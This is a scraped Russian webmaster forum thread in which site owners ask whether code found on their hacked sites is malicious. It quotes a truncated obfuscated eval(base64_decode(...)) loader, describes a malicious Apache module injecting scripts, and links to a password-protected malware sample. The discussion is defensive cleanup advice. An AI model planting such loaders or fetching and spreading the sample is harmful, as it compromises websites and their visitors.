- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
#RewriteCond %{REQUEST_URI} /[0-9a-z_\-]+(/|\.html?|\.php)?$
#RewriteCond %{REQUEST_URI} !^/(css|files|img|js)/
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?url=$1 [QSA,L]
в этом коде ни чего нет - опасного?
Это .htaccess у вас такой? Тут всё нормально.
---------- Добавлено 30.07.2013 в 12:24 ----------
Вот что интересное нашел! Это нормальный код или???
eval(base64_decode('Pz48P3BocAppZihmdW...
Это "или". Удаляйте и ищите шелл.
В моём случае на сайте шелла не было, редирект прописывался на уровне сервера (кто-то взломал сервер). Хостер проблему не признал, но после переезда на другой сервер всё наладилось.
Удалил еще вчера!
Но вот что самое интересное єта зараза на другие сайті лезет и цепляет! Хостер говорит что у них все нормально. Хотя я подозреваю что дело все таки на сервере!
Это .htaccess у вас такой? Тут всё нормально.
Это "или". Удаляйте и ищите шелл.
В моём случае на сайте шелла не было, редирект прописывался на уровне сервера (кто-то взломал сервер). Хостер проблему не признал, но после переезда на другой сервер всё наладилось.
на виртуалке у fotka был загружен модуль апача mod_chart_version.so, который изредка вставлял после первого </script> свой блок типа такого
что-то из семейства chapro
https://www.virustotal.com/ru/file/69ba698593e183cf42c6d26944630040b0c914f20844010f9ddf965f32cb0826/analysis/
файлик с паролем CocUnJat6 лежит по адресу http://zalil.ru/34653952
----------------deleted-------------------
а у меня ругается на рекламу партнёрки promo-reklama.ру , не знаю как и лечить
вот на этот код:
<div align="center"><script type="text/javascript" charset="windows-1251" src="http://prre.ru/bout.php?id=........&type=1"></script></div>
1TIT1, ну а что там лечить, удаляем партнерку и едем дальше.
1TIT1, ну а что там лечить, удаляем партнерку и едем дальше.
Так они уверяют что они белые и пушистые, что не у кого больше такой проблемы нет, они мне даже привели примеры сайтов где стоит их партнёрка, и действительно sucuri не чего не нашёл .